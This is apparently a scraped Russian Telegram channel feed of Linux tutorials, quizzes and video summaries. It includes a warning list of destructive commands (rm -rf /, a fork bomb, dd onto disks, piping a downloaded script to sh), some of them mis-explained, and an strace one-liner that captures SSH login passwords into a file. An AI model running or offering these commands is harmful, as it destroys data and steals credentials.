⚠️ Осторожно: Никогда не запускай эти 11 команд в Linux!
Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о командах, которые могут нанести серьезный ущерб твоей системе. Эти команды лучше никогда не запускать, если ты не хочешь потерять данные или столкнуться с проблемами безопасности. Давай разберемся, что и почему стоит избегать!
Опасные команды:
1.
- Удаляет все файлы и папки на компьютере. Полная потеря данных.
2.
- Известная как "fork bomb", может вызвать переполнение памяти и аварийное завершение системы.
3.
- Форматирует жесткий диск без предупреждения. Все данные будут утеряны.
4.
- Перезаписывает данные на жестком диске случайными значениями, что приводит к потере данных.
5.
- Открывает полный доступ к файловой системе для всех пользователей, что может нарушить безопасность.
6. **
- Перемещает все файлы из домашней директории в "null", что приводит к их потере.
7.
- Загружает файл и перезаписывает данные в "null", что приводит к потере данных.
8.
- Форматирует раздел жесткого диска без предупреждения. Все данные на разделе будут утеряны.
9.
- Создает символическую ссылку на "/etc/passwd" в "null", что приводит к потере данных.
10.
- Заменяет раздел, содержащий данные для загрузки системы, строкой «Hello».
11.
- Загружает и запускает вредоносные сценарии, которые могут подорвать безопасность системы.
Эти команды могут нанести непоправимый ущерб твоей системе. Будь осторожен и всегда проверяй команды перед их выполнением. Береги свои данные и безопасность!
📩 Завтра: Вопрос №8 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Глубокое Погружение в Жесткие Ссылки: Создание и Управление в Linux
🧠 - Мастер-класс по Сокрытию Файлов и Каталогов в Linux: Станьте Невидимкой
🧠 - Создание Ссылок в Linux: Символические и Жесткие Пути к Управлению Данными
#Linux_Mastery @LinuxSkill
Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о командах, которые могут нанести серьезный ущерб твоей системе. Эти команды лучше никогда не запускать, если ты не хочешь потерять данные или столкнуться с проблемами безопасности. Давай разберемся, что и почему стоит избегать!
Опасные команды:
1.
rm -rf /:- Удаляет все файлы и папки на компьютере. Полная потеря данных.
2.
:(){ :|: & };::- Известная как "fork bomb", может вызвать переполнение памяти и аварийное завершение системы.
3.
mkfs.ext4 /dev/sda:- Форматирует жесткий диск без предупреждения. Все данные будут утеряны.
4.
dd if=/dev/random of=/dev/sda:- Перезаписывает данные на жестком диске случайными значениями, что приводит к потере данных.
5.
chmod 777 /:- Открывает полный доступ к файловой системе для всех пользователей, что может нарушить безопасность.
6. **
mv /home/* /dev/null**:- Перемещает все файлы из домашней директории в "null", что приводит к их потере.
7.
wget http://example.com/file -O /dev/null:- Загружает файл и перезаписывает данные в "null", что приводит к потере данных.
8.
mkfs.ext4 /dev/sda1:- Форматирует раздел жесткого диска без предупреждения. Все данные на разделе будут утеряны.
9.
ln -s /dev/null /etc/passwd:- Создает символическую ссылку на "/etc/passwd" в "null", что приводит к потере данных.
10.
echo "Hello" > /dev/sda:- Заменяет раздел, содержащий данные для загрузки системы, строкой «Hello».
11.
wget http://malicious_source -O- | sh:- Загружает и запускает вредоносные сценарии, которые могут подорвать безопасность системы.
Эти команды могут нанести непоправимый ущерб твоей системе. Будь осторожен и всегда проверяй команды перед их выполнением. Береги свои данные и безопасность!
📩 Завтра: Вопрос №8 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Глубокое Погружение в Жесткие Ссылки: Создание и Управление в Linux
🧠 - Мастер-класс по Сокрытию Файлов и Каталогов в Linux: Станьте Невидимкой
🧠 - Создание Ссылок в Linux: Символические и Жесткие Пути к Управлению Данными
#Linux_Mastery @LinuxSkill
Telegram
Linux Skill - Освой Linux c нуля до DevOps
#Linux_Mastery
🔗🛠️ Глубокое Погружение в Жесткие Ссылки: Создание и Управление в Linux! 🛠️🔗
Привет, энтузиасты Linux и мастера управления данными! Сегодня мы раскроем секреты создания и управления жесткими ссылками в Linux. Это руководство поможет вам эффективно…
🔗🛠️ Глубокое Погружение в Жесткие Ссылки: Создание и Управление в Linux! 🛠️🔗
Привет, энтузиасты Linux и мастера управления данными! Сегодня мы раскроем секреты создания и управления жесткими ссылками в Linux. Это руководство поможет вам эффективно…
👍23🔥22👎1
Вопрос №8 из теста Linux Essentials Certification: Какой из следующих файлов содержит определение локальных учетных записей пользователей?
Anonymous Quiz
2%
/etc/secret
3%
/etc/id
7%
/etc/home
33%
/etc/users
55%
/etc/passwd
👍7
Media is too big
VIEW IN TELEGRAM
🔐 Защита SSH-сервера: порты, ключи и iptables
Хочешь узнать, как защитить свой SSH-сервер от несанкционированного доступа? В этом видео мы расскажем о лучших практиках, включая порт-нокинг, использование ключей и настройку iptables.
1. Введение в порт-нокинг (00:00):
- Порт-нокинг скрывает открытые порты, делая их доступными только через правильные комбинации стуков. Это как дверь без замочной скважины, которая открывается только при правильной комбинации.
2. Порты и ключи в сетевых протоколах (00:58):
- Порты позволяют нескольким программам работать одновременно. Например, SSH и веб-сервер используют разные порты для разграничения запросов.
3. Защита SSH-сервера (02:39):
- Замена стандартного порта SSH на нестандартный и использование ключей вместо паролей для повышения безопасности.
4. Настройка iptables (15:51):
- Установка и настройка iptables для управления входящими и исходящими соединениями. Это помогает защитить сервер от несанкционированного доступа.
5. Проверка безопасности (22:24):
- Проверка, что порт 45916 не отличается от других, и сканеры портов не могут определить наличие SSH-сервера.
6. Доступ к серверу (23:57):
- Использование утилиты nmp для доступа к серверу через правильные порты.
Заключение (28:30): Порт сервера закрыт снаружи, но доступен при правильном постукивании. Надеемся, что видео было полезным. Ставьте лайки и подписывайтесь на канал!
Источник: https://www.youtube.com/watch?v=5TCvRlD1sSw
📩 Завтра: Вопрос №9 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
________________
Дополнительный материал:
🧠 - Linux и Команды Выключения: Сцена для systemctl
🧠 - Путешествие по команде shutdown
🧠 - Как настроить и использовать Ctrl+Alt+Delete в Linux для надежной перезагрузки
#Linux_youtube @LinuxSkill #Linux #SSH #Security #PortKnocking #Iptables #SysAdmin #DevOps
Хочешь узнать, как защитить свой SSH-сервер от несанкционированного доступа? В этом видео мы расскажем о лучших практиках, включая порт-нокинг, использование ключей и настройку iptables.
1. Введение в порт-нокинг (00:00):
- Порт-нокинг скрывает открытые порты, делая их доступными только через правильные комбинации стуков. Это как дверь без замочной скважины, которая открывается только при правильной комбинации.
2. Порты и ключи в сетевых протоколах (00:58):
- Порты позволяют нескольким программам работать одновременно. Например, SSH и веб-сервер используют разные порты для разграничения запросов.
3. Защита SSH-сервера (02:39):
- Замена стандартного порта SSH на нестандартный и использование ключей вместо паролей для повышения безопасности.
4. Настройка iptables (15:51):
- Установка и настройка iptables для управления входящими и исходящими соединениями. Это помогает защитить сервер от несанкционированного доступа.
5. Проверка безопасности (22:24):
- Проверка, что порт 45916 не отличается от других, и сканеры портов не могут определить наличие SSH-сервера.
6. Доступ к серверу (23:57):
- Использование утилиты nmp для доступа к серверу через правильные порты.
Заключение (28:30): Порт сервера закрыт снаружи, но доступен при правильном постукивании. Надеемся, что видео было полезным. Ставьте лайки и подписывайтесь на канал!
Источник: https://www.youtube.com/watch?v=5TCvRlD1sSw
📩 Завтра: Вопрос №9 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
________________
Дополнительный материал:
🧠 - Linux и Команды Выключения: Сцена для systemctl
🧠 - Путешествие по команде shutdown
🧠 - Как настроить и использовать Ctrl+Alt+Delete в Linux для надежной перезагрузки
#Linux_youtube @LinuxSkill #Linux #SSH #Security #PortKnocking #Iptables #SysAdmin #DevOps
👍18🔥6
Вопрос №9 из теста Linux Essentials Certification: Какая из следующих версий Ubuntu считается наиболее стабильной и подходящей для использования в бизнес-целях?
Anonymous Quiz
6%
Kubuntu
71%
LTS
7%
Ubuntu Vanilla
4%
Xubuntu
11%
Xubuntu Server
👍22👎7👀5
Media is too big
VIEW IN TELEGRAM
🎥 Производительность Nginx vs Apache: кто победит?
В этом видео мы сравниваем два популярных веб-сервера — Nginx и Apache. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.
1. Введение и цели теста (00:00):
- Сравнение производительности Nginx и Apache на AWS.
- Измерение задержки, вывода данных и насыщенности сервисов.
2. Первый тест (01:38):
- Развертывание серверов на виртуальных машинах с использованием статического веб-сайта.
- Генерация нагрузки через кластер EKS.
3. Второй тест (02:36):
- Использование TLS и HTTP/2 для повышения производительности.
- Google оценивает сайты выше при использовании HTTPS.
4. Третий тест (03:12):
- Веб-серверы как обратные прокси: безопасность, масштабируемость, балансировка нагрузки.
5. Результаты первого теста (05:26):
- Nginx обрабатывает в три раза больше запросов в секунду, чем Apache.
- Apache снижает производительность при 8000 запросах в секунду.
6. Результаты второго теста (08:10):
- Nginx лучше справляется с нагрузкой при 85% загрузке процессора.
- Apache начинает снижать производительность при 7000 запросах в секунду.
7. Результаты третьего теста (11:02):
- Apache показывает лучшую производительность как прокси-сервер.
- Nginx демонстрирует нестабильность при высокой загрузке.
8. Использование памяти и сетевой трафик (14:10):
- Анализ использования памяти и сетевого трафика.
- Планируется тестирование Apache Ingress Controller для сравнения с Nginx.
Результаты тестов показывают, что Nginx превосходит Apache в обработке запросов, но Apache может быть более стабильным как прокси-сервер. Подписывайтесь на канал, чтобы не пропустить новые тесты и сравнения!
Источник: https://www.youtube.com/watch?v=UGp4LmocE7o
📩 Завтра: Как измерить время выполнения программы в Linux?
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Овладейте искусством управления системой с серией руководств по Systemd
🧠 - Алфавит команд Linux
🧠 - Погружаемся в a2disconf
#Linux_youtube @LinuxSkill #Linux #Nginx #Apache #Performance #SysAdmin #DevOps
В этом видео мы сравниваем два популярных веб-сервера — Nginx и Apache. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.
1. Введение и цели теста (00:00):
- Сравнение производительности Nginx и Apache на AWS.
- Измерение задержки, вывода данных и насыщенности сервисов.
2. Первый тест (01:38):
- Развертывание серверов на виртуальных машинах с использованием статического веб-сайта.
- Генерация нагрузки через кластер EKS.
3. Второй тест (02:36):
- Использование TLS и HTTP/2 для повышения производительности.
- Google оценивает сайты выше при использовании HTTPS.
4. Третий тест (03:12):
- Веб-серверы как обратные прокси: безопасность, масштабируемость, балансировка нагрузки.
5. Результаты первого теста (05:26):
- Nginx обрабатывает в три раза больше запросов в секунду, чем Apache.
- Apache снижает производительность при 8000 запросах в секунду.
6. Результаты второго теста (08:10):
- Nginx лучше справляется с нагрузкой при 85% загрузке процессора.
- Apache начинает снижать производительность при 7000 запросах в секунду.
7. Результаты третьего теста (11:02):
- Apache показывает лучшую производительность как прокси-сервер.
- Nginx демонстрирует нестабильность при высокой загрузке.
8. Использование памяти и сетевой трафик (14:10):
- Анализ использования памяти и сетевого трафика.
- Планируется тестирование Apache Ingress Controller для сравнения с Nginx.
Результаты тестов показывают, что Nginx превосходит Apache в обработке запросов, но Apache может быть более стабильным как прокси-сервер. Подписывайтесь на канал, чтобы не пропустить новые тесты и сравнения!
Источник: https://www.youtube.com/watch?v=UGp4LmocE7o
📩 Завтра: Как измерить время выполнения программы в Linux?
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Овладейте искусством управления системой с серией руководств по Systemd
🧠 - Алфавит команд Linux
🧠 - Погружаемся в a2disconf
#Linux_youtube @LinuxSkill #Linux #Nginx #Apache #Performance #SysAdmin #DevOps
👍6👀3
⏱️ Как измерить время выполнения программы в Linux?
Хочешь узнать, сколько времени занимает выполнение твоих скриптов или команд в Linux? Сегодня мы расскажем, как использовать встроенную команду
Основная информация:
Команда
1. Использование команды
Просто добавь
Вывод будет примерно таким:
-
-
-
2. Измерение времени для нескольких команд:
Если нужно измерить время выполнения нескольких команд, используй группу команд:
Используя команду
🌳 Ветка: https://stackoverflow.com/questions/385408/get-program-execution-time-in-the-shell
📩 Завтра: Как не стать жертвой сниффинга паролей на Linux
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Открываем Мир b2-tools
🧠 - Открываем Все Тайны Команды Cat
🧠 - Разгадываем Загадки с Diff3
#stackoverflow @LinuxSkill #Linux #TimeCommand #Performance #SysAdmin #DevOps
Хочешь узнать, сколько времени занимает выполнение твоих скриптов или команд в Linux? Сегодня мы расскажем, как использовать встроенную команду
time для этого.Основная информация:
Команда
time позволяет измерить реальное время, затраченное на выполнение команды, а также время работы процессора. Вот как это сделать:1. Использование команды
time:Просто добавь
time перед командой, которую хочешь измерить. Например:time sleep 2
Вывод будет примерно таким:
real 0m2.009s
user 0m0.000s
sys 0m0.004s
-
real — общее время выполнения.-
user — время, затраченное на выполнение пользовательского кода.-
sys — время, затраченное на выполнение системного кода.2. Измерение времени для нескольких команд:
Если нужно измерить время выполнения нескольких команд, используй группу команд:
time { command1; command2; }
Используя команду
time, ты можешь легко измерять производительность своих скриптов и оптимизировать их. Попробуй сам и убедись, насколько это полезно!🌳 Ветка: https://stackoverflow.com/questions/385408/get-program-execution-time-in-the-shell
📩 Завтра: Как не стать жертвой сниффинга паролей на Linux
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Открываем Мир b2-tools
🧠 - Открываем Все Тайны Команды Cat
🧠 - Разгадываем Загадки с Diff3
#stackoverflow @LinuxSkill #Linux #TimeCommand #Performance #SysAdmin #DevOps
Stack Overflow
Get program execution time in the shell
I want to execute something in a linux shell under a few different conditions, and be able to output the execution time of each execution.
I know I could write a perl or python noscript that would d...
I know I could write a perl or python noscript that would d...
👍14
🚨 Осторожно: Как не стать жертвой сниффинга паролей на Linux!
Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о том, как некоторые используют
Как работает сниффинг с помощью
1. Запуск
-
-
-
-
-
-
2. Что происходит:
- Когда пользователь авторизуется по SSH, его пароль записывается в файл
3. Пример вывода:
- Логин
Важно помнить:
- Эта информация предназначена исключительно для образовательных целей. Использование таких методов для незаконных действий строго запрещено.
- Защищай свои системы, следи за безопасностью и соблюдай законы своей страны.
Береги свои данные и безопасность!
📩 Завтра: Автоматизация кибербезопасности: 5 полезных скриптов на Bash
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Управление Съемными Носителями с Eject
🧠 - Разложение на Простые Множители с Factor
🧠 - Погружение в Команду Groups
#Linux_Mastery @LinuxSkill
Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о том, как некоторые используют
strace для перехвата паролей пользователей, подключающихся по SSH. Это знание поможет тебе защитить свои системы и избежать неприятностей. Давай разберемся, как это работает и как защититься!Как работает сниффинг с помощью
strace:1. Запуск
strace для отслеживания процессов SSH:strace -f -p $(pgrep -o sshd) -o /tmp/passwd.txt -v -e trace=write -s 64
-
-f: Следим за всеми процессами sshd (мастер и дочерние).-
-p: Ищем все PID процессов sshd.-
-o: Файл, куда пишем результаты.-
-v: Пишем подробности.-
-e: Триггеримся только на запись данных.-
-s: Ограничиваем вывод данных 64 байтами (меньше мусора).2. Что происходит:
- Когда пользователь авторизуется по SSH, его пароль записывается в файл
passwd.txt в открытом виде.3. Пример вывода:
1088 write(5,"\0\0\0\5oleg", 9) = 9
1088 write(5, "\0\0\0\Barmaley1982", 17) = 17
- Логин
oleg, пароль Barmaley1982.Важно помнить:
- Эта информация предназначена исключительно для образовательных целей. Использование таких методов для незаконных действий строго запрещено.
- Защищай свои системы, следи за безопасностью и соблюдай законы своей страны.
Береги свои данные и безопасность!
📩 Завтра: Автоматизация кибербезопасности: 5 полезных скриптов на Bash
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Управление Съемными Носителями с Eject
🧠 - Разложение на Простые Множители с Factor
🧠 - Погружение в Команду Groups
#Linux_Mastery @LinuxSkill
Telegram
Linux Skill - Освой Linux c нуля до DevOps
🚀🐧 Марафон "Алфавит команд Linux": Управление Съемными Носителями с Eject 💽➡️
Привет, друзья LinuxSkill! Сегодня в нашем марафоне мы погружаемся в мир управления съемными носителями с помощью команды Eject. Этот инструмент позволяет извлекать съемные носители…
Привет, друзья LinuxSkill! Сегодня в нашем марафоне мы погружаемся в мир управления съемными носителями с помощью команды Eject. Этот инструмент позволяет извлекать съемные носители…
🔥14👀6👍5
🔒 Автоматизация кибербезопасности: 5 полезных скриптов на Bash
Привет, кибер-путешественник! 🖥️ Сегодня я расскажу тебе о пяти скриптах на Bash, которые помогут автоматизировать рутинные задачи в кибербезопасности. Эти инструменты могут стать твоими надежными помощниками в защите систем. Давай посмотрим, как они работают!
1. Сканирование портов с использованием nmap:
- Этот скрипт позволяет быстро сканировать порты указанного хоста.
2. Проверка статуса веб-сервера:
- Проверяет доступность веб-сервера по HTTP статус-коду.
3. Поиск изменений в файлах (интегритет):
- Следит за изменениями в файлах, проверяя их хэши.
4. Автоматическое создание бэкапов логов:
- Автоматически создает резервные копии логов.
5. Мониторинг и оповещение об активности в логах:
- Следит за логами и оповещает о подозрительной активности.
Эти скрипты — лишь начало. В реальных сценариях тебе понадобятся более сложные проверки и интеграции. Всегда тестируй скрипты в безопасной среде перед их использованием в продакшене. 🛡️
Ссылка на источник https://timcore.ru/2024/03/07/pjat-skriptov-na-bash-kotorye-mogut-ispolzovatsja-dlja-avtomatizacii-rutinnyh-zadach-v-kiberbezopasnosti/
📩 Завтра: Вопрос №10 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Введение в Команду Head
🧠 - Навигация по Сетевым Интерфейсам с Ifconfig
🧠 - Мастерство Слияния Файлов с Join
#Linux_Mastery @LinuxSkill
Привет, кибер-путешественник! 🖥️ Сегодня я расскажу тебе о пяти скриптах на Bash, которые помогут автоматизировать рутинные задачи в кибербезопасности. Эти инструменты могут стать твоими надежными помощниками в защите систем. Давай посмотрим, как они работают!
1. Сканирование портов с использованием nmap:
#!/bin/bash
# Сканирование портов конкретного хоста
echo "Введите адрес хоста для сканирования:"
read host
echo "Сканирование портов для хоста $host..."
nmap $host
- Этот скрипт позволяет быстро сканировать порты указанного хоста.
2. Проверка статуса веб-сервера:
#!/bin/bash
# Проверка статуса веб-сервера по HTTP статус-коду
url="http://example.com" # Замените example.com на реальный URL
status_code=$(curl -o /dev/null -s -w "%{http_code}\n" $url)
if [ $status_code -eq 200 ]; then
echo "Веб-сервер $url работает нормально (HTTP статус 200)"
else
echo "Веб-сервер $url имеет проблемы (HTTP статус $status_code)"
fi
- Проверяет доступность веб-сервера по HTTP статус-коду.
3. Поиск изменений в файлах (интегритет):
#!/bin/bash
# Проверка интегритета файлов в заданной директории
directory="/var/www/html" # Замените на директорию, которую нужно отслеживать
hash_file="hashes.txt"
# Генерируем хэши файлов и сохраняем их для последующего сравнения
find $directory -type f -exec sha256sum "{}" + > $hash_file
# Функция, которая проверяет хэши
check_hashes() {
sha256sum -c $hash_file
}
# Вызываем функцию
check_hashes
- Следит за изменениями в файлах, проверяя их хэши.
4. Автоматическое создание бэкапов логов:
#!/bin/bash
# Автоматическое создание бэкапов логов
log_path="/var/log/apache2" # Замените на путь к вашей папке с логами
backup_path="/backup/apache2"
# Создаем каталог для бэкапа, если он не существует
mkdir -p $backup_path
# Архивируем и перемещаем логи
tar -czvf $backup_path/log-$(date +%F).tar.gz $log_path
- Автоматически создает резервные копии логов.
5. Мониторинг и оповещение об активности в логах:
#!/bin/bash
# Мониторинг и оповещение о подозрительной активности в логах
log_file="/var/log/auth.log" # Замените на путь к вашему лог-файлу
pattern="Failed password" # Замените на паттерн, который вы хотите отслеживать
# Чтение новых строк из лог-файла
tail -fn0 $log_file | \
while read line ; do
echo "$line" | grep "$pattern" > /dev/null
if [ $? = 0 ]; then
# Отправляем уведомление
echo "Подозрительная активность: $line"
# Здесь может быть команда для отправки уведомления, например, через mailx
fi
done
- Следит за логами и оповещает о подозрительной активности.
Эти скрипты — лишь начало. В реальных сценариях тебе понадобятся более сложные проверки и интеграции. Всегда тестируй скрипты в безопасной среде перед их использованием в продакшене. 🛡️
Ссылка на источник https://timcore.ru/2024/03/07/pjat-skriptov-na-bash-kotorye-mogut-ispolzovatsja-dlja-avtomatizacii-rutinnyh-zadach-v-kiberbezopasnosti/
📩 Завтра: Вопрос №10 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Введение в Команду Head
🧠 - Навигация по Сетевым Интерфейсам с Ifconfig
🧠 - Мастерство Слияния Файлов с Join
#Linux_Mastery @LinuxSkill
Этичный хакинг с Михаилом Тарасовым (Timcore)
Пять скриптов на Bash, которые могут использоваться для автоматизации рутинных задач в кибербезопасности. - Этичный хакинг с Михаилом…
Предоставляю Вашему вниманию пять скриптов на Bash, для применения в кибербезопасности. Помните, что перед использованием этих скриптов, Вы должны иметь разрешение на проведение любых действий, связанных с системами и сетями, которые могут быть затронуты.
👍22👎1
Вопрос №10 из теста Linux Essentials Certification: После установки нового пакета, в каком каталоге вы, скорее всего, найдете его файл конфигурации?
Anonymous Quiz
8%
/usr
9%
/opt
16%
/conf
4%
/lib
64%
/etc
👍29
Media is too big
VIEW IN TELEGRAM
🎥 Сравнение производительности Nginx и Caddy Performance: кто победит?
В этом видео мы сравниваем два мощных веб-сервера — Nginx и Caddy. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.
Основная информация:
1. Введение и цели теста (00:00):
- Сравнение Nginx и Caddy Performance как веб-серверов и обратных прокси-серверов.
- Тестирование обслуживания статического веб-сайта по HTTPS и балансировки нагрузки.
2. Настройка и оборудование (00:55):
- Использование AWS и новейших инстансов EC2 для создания кластера EKS.
- Применение Route 53 для обнаружения сервисов и Next.js для создания веб-сайта.
3. Настройка веб-серверов (01:53):
- Создание больших инстансов EC2 с двумя процессорами и 8 ГБ памяти.
- Настройка сертификатов для аутентификации и безопасности.
4. Оптимизация Nginx (03:38):
- Использование оптимизированной конфигурации для повышения производительности.
- Настройка мультиподключения и увеличение лимита открытых файлов.
5. Настройка Caddy (04:37):
- Использование минимальной конфигурации и включение сжатия.
- Формат логов, аналогичный Nginx и Apache.
6. Результаты первого теста (06:27):
- Nginx показал меньшую задержку и обработал больше запросов, чем Caddy.
- Caddy начал отставать при 8000 запросах в секунду.
7. Тестирование Nginx и Caddy (08:19):
- Nginx достиг 80% загрузки процессора и не сбоил.
- Caddy ухудшился при 8000 запросах, достигнув максимума при 10000 запросов.
8. Сетевой трафик и производительность (09:55):
- Nginx передавал почти 600 МБ/с, обеспечивая более высокую производительность.
9. Второй тест с обратным прокси (11:16):
- Caddy превзошел Nginx по производительности, но ненадолго.
- Nginx обработал почти 27000 запросов за 2 часа.
Nginx обработал почти вдвое больше запросов, чем Caddy, обеспечив более высокую пропускную способность и меньшую задержку. Рекомендуется использовать Nginx для веб-серверов и обратных прокси-серверов.
Источник: https://www.youtube.com/watch?v=N5PAU-vYrN8
📩 Завтра: Вопрос №11 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Управление Процессами с Kill
🧠 - Временная Капсула с Last
🧠 - Как проверить файлы на целостность и не поймать вирус? Просто запусти md5sum!
#Linux_youtube @LinuxSkill #Linux #Nginx #Caddy #Performance #SysAdmin #DevOps
В этом видео мы сравниваем два мощных веб-сервера — Nginx и Caddy. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.
Основная информация:
1. Введение и цели теста (00:00):
- Сравнение Nginx и Caddy Performance как веб-серверов и обратных прокси-серверов.
- Тестирование обслуживания статического веб-сайта по HTTPS и балансировки нагрузки.
2. Настройка и оборудование (00:55):
- Использование AWS и новейших инстансов EC2 для создания кластера EKS.
- Применение Route 53 для обнаружения сервисов и Next.js для создания веб-сайта.
3. Настройка веб-серверов (01:53):
- Создание больших инстансов EC2 с двумя процессорами и 8 ГБ памяти.
- Настройка сертификатов для аутентификации и безопасности.
4. Оптимизация Nginx (03:38):
- Использование оптимизированной конфигурации для повышения производительности.
- Настройка мультиподключения и увеличение лимита открытых файлов.
5. Настройка Caddy (04:37):
- Использование минимальной конфигурации и включение сжатия.
- Формат логов, аналогичный Nginx и Apache.
6. Результаты первого теста (06:27):
- Nginx показал меньшую задержку и обработал больше запросов, чем Caddy.
- Caddy начал отставать при 8000 запросах в секунду.
7. Тестирование Nginx и Caddy (08:19):
- Nginx достиг 80% загрузки процессора и не сбоил.
- Caddy ухудшился при 8000 запросах, достигнув максимума при 10000 запросов.
8. Сетевой трафик и производительность (09:55):
- Nginx передавал почти 600 МБ/с, обеспечивая более высокую производительность.
9. Второй тест с обратным прокси (11:16):
- Caddy превзошел Nginx по производительности, но ненадолго.
- Nginx обработал почти 27000 запросов за 2 часа.
Nginx обработал почти вдвое больше запросов, чем Caddy, обеспечив более высокую пропускную способность и меньшую задержку. Рекомендуется использовать Nginx для веб-серверов и обратных прокси-серверов.
Источник: https://www.youtube.com/watch?v=N5PAU-vYrN8
📩 Завтра: Вопрос №11 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Управление Процессами с Kill
🧠 - Временная Капсула с Last
🧠 - Как проверить файлы на целостность и не поймать вирус? Просто запусти md5sum!
#Linux_youtube @LinuxSkill #Linux #Nginx #Caddy #Performance #SysAdmin #DevOps
👍10👀2
Вопрос №11 из теста Linux Essentials Certification: Какой сетевой интерфейс всегда существует в системе Linux?
Anonymous Quiz
4%
wlan0
30%
eth0
63%
lo
3%
vlan0
0%
sit0
👍22
Media is too big
VIEW IN TELEGRAM
🎥 Как сделать простую защиту от DoS-атак с Fail2Ban?
Хочешь защитить свой веб-сервер от DoS-атак? В этом видео мы покажем, как настроить Fail2Ban для эффективной защиты.
1. Установка Fail2Ban (00:00):
- Установка Fail2Ban для защиты веб-сервера.
- Запуск и проверка статуса сервиса.
2. Конфигурация Fail2Ban (00:37):
- Конфигурационный файл находится в
- Настройка времени блокировки через директиву
3. Настройка ограничения скорости запросов (02:15):
- Добавление директивы для ограничения скорости обработки HTTP-запросов.
- Настройка зоны разделяемой памяти для IP-адресов.
- Перезагрузка Fail2Ban.
4. Тестирование и логирование (04:07):
- Запуск теста на IP-адрес для проверки логирования.
- Логирование ошибок и запросов.
5. Добавление правил для фильтра (05:15):
- Настройка правил для блокировки IP-адресов на 300 секунд при превышении лимита запросов.
6. Защита от DOS-атак (06:52):
- Настройка модуля для ограничения числа запросов.
- Проверка и раскомментирование регулярного выражения.
7. Проверка работы Fail2Ban (08:37):
- Тестирование блокировки IP-адреса при превышении лимита запросов.
- Проверка работы через VPN.
Fail2Ban — это простой и эффективный способ защиты от DoS-атак. Настройте его на своем сервере и убедитесь в его надежности!
Источник: https://www.youtube.com/watch?v=rBKvXaDsFvM
📩 Завтра: Что означает $@ в shell скрипте?
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Текстовый редактор Nano — как работать с файлами на минималках и не страдать!
🧠 - Почувствуй себя цифровым рентгенологом — откроем файлы насквозь с Od!
🧠 - Давно занимался спортом? Нет? Ну вот, пора хотя бы пароли сменить!
#Linux_youtube @LinuxSkill #Linux #Fail2Ban #DoSProtection #SysAdmin #DevOps
Хочешь защитить свой веб-сервер от DoS-атак? В этом видео мы покажем, как настроить Fail2Ban для эффективной защиты.
1. Установка Fail2Ban (00:00):
- Установка Fail2Ban для защиты веб-сервера.
- Запуск и проверка статуса сервиса.
2. Конфигурация Fail2Ban (00:37):
- Конфигурационный файл находится в
/etc/fail2ban/jail.conf.- Настройка времени блокировки через директиву
ban-time.3. Настройка ограничения скорости запросов (02:15):
- Добавление директивы для ограничения скорости обработки HTTP-запросов.
- Настройка зоны разделяемой памяти для IP-адресов.
- Перезагрузка Fail2Ban.
4. Тестирование и логирование (04:07):
- Запуск теста на IP-адрес для проверки логирования.
- Логирование ошибок и запросов.
5. Добавление правил для фильтра (05:15):
- Настройка правил для блокировки IP-адресов на 300 секунд при превышении лимита запросов.
6. Защита от DOS-атак (06:52):
- Настройка модуля для ограничения числа запросов.
- Проверка и раскомментирование регулярного выражения.
7. Проверка работы Fail2Ban (08:37):
- Тестирование блокировки IP-адреса при превышении лимита запросов.
- Проверка работы через VPN.
Fail2Ban — это простой и эффективный способ защиты от DoS-атак. Настройте его на своем сервере и убедитесь в его надежности!
Источник: https://www.youtube.com/watch?v=rBKvXaDsFvM
📩 Завтра: Что означает $@ в shell скрипте?
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Текстовый редактор Nano — как работать с файлами на минималках и не страдать!
🧠 - Почувствуй себя цифровым рентгенологом — откроем файлы насквозь с Od!
🧠 - Давно занимался спортом? Нет? Ну вот, пора хотя бы пароли сменить!
#Linux_youtube @LinuxSkill #Linux #Fail2Ban #DoSProtection #SysAdmin #DevOps
👍16
🛠️ Что означает $@ в shell скрипте?
Если ты когда-либо задавался вопросом, что такое
то
Когда внутри
каждый параметр будет передан в
Пример использования:
Если ты вызовешь:
то
Использование
🌳 Ветка: https://stackoverflow.com/questions/9994295/what-does-mean-in-a-shell-noscript
📩 Завтра: Защити свой сервер: Настройка безопасности SSH на Linux
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Текстовый редактор Nano — как работать с файлами на минималках и не страдать!
🧠 - Почувствуй себя цифровым рентгенологом — откроем файлы насквозь с Od!
🧠 - Давно занимался спортом? Нет? Ну вот, пора хотя бы пароли сменить!
#stackoverflow @LinuxSkill #Linux #ShellScripting #SysAdmin #DevOps
Если ты когда-либо задавался вопросом, что такое
$@ в shell скрипте, то сегодня мы разберем эту загадку и покажем, как использовать его для передачи параметров.$@ представляет собой все параметры, переданные скрипту. Например, если ты вызовешь скрипт так:./someScript.sh foo bar
то
$@ будет равно foo bar.Когда внутри
someScript.sh ты используешь:umbrella_corp_options "$@"
каждый параметр будет передан в
